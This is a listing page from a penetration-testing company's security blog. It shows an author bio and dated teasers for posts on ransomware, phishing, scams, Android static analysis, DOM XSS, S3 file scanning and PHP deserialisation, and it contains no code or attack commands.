Security Blog

Feature development & monitoring tips

Author: Josh Hickling

Josh is one of Pentest Peoples Web Application testers, coming from a university background, who's heavily interested in the ethical hacking world.

May 16, 2022

Two Minutes of Ransomware Attacks: The Facts

Two Minutes of Ransomware Attacks: The Facts In this blog post, we will discuss what Ransomware is, how it is used and the risks associated with it. We will also provide tips on how to protect yourself from ransomware attacks. If you prefer to watch Liam explain Ransomware in two minutes, click here. What is […]

Find Out More
February 18, 2022

Apple Cyber Attacks: Mobile Devices Still at Risk

Apple Cyber Attack Apple iPhone users are one of the largest targets when it comes to cyber-attacks. Apple uncovered its biggest hack in history last November, which went undetected for five years. At the time they alerted users who had fallen victim to the colossal Apple cyber attack. The Phishing Hack targeted Apple’s iCloud service […]

Find Out More
February 14, 2022

Valentines Scams

This Valentine’s Day, be aware of the different scams that may be targeting you. We’ll cover how to avoid fraud, catfishing and other techniques used by scammers this Valentine’s Day.

Find Out More
February 7, 2022

European Oil Hacks

Today we launch the start of the Pentest People News Bites, starting off with the recent European Oil Hack with some cyber advice from one of our senior consultants.

Find Out More
January 19, 2022

Under the Sheets, Practical Android Static Analysis

In this blog, the topic of Android client-side controls is discussed. Client-side controls are a topic of controversy with the Mobile Security industry, in almost all cases providing only a layer of obscurity between an attacker and potentially sensitive functionality. The aim of this piece is to demonstrate how this may be exploited during a Penetration test and why such controls are inherently vulnerable to interference from an attacker.

Find Out More
January 22, 2021

Depop Industrial Level Hacking

After the recent news regarding the Depop account hacks, Josh Hickling, resident Web App tester explains how this has happened and how you, the user, can protect yourself.

Find Out More
June 17, 2020

So, what is DOM XSS?

Cross Site Scripting (XSS) is one of the most well covered web application issues around, however it is surprising how little people truly understand the concept of DOM Based vectors. This blog will aim to clear that confusion up, discussing the difference between traditional and DOM based XSS.

Find Out More
March 23, 2020

S3 and the Anti-Virus Scan

Amazon S3 is a great, cheap and flexible option when it comes to sharing and hosting files. However what is not great is that any file can be uploaded to a S3 bucket. And by any file we mean any file including malicious files. It is very common for people not to check the files that are uploaded to S3. But it is possible to virus scan files uploaded to S3. it just takes a little bit of work.

Find Out More
February 17, 2020

PHP Deserialisation/Object Injection

PHP Deserialization vulnerabilities are rarely seen on Greybox application assessments, however these should not be overlooked. This blog will look at PHP Deserialzation/Object injection covering how these vulnerabilities can be spotted and the exploit code required to read local files.

Find Out More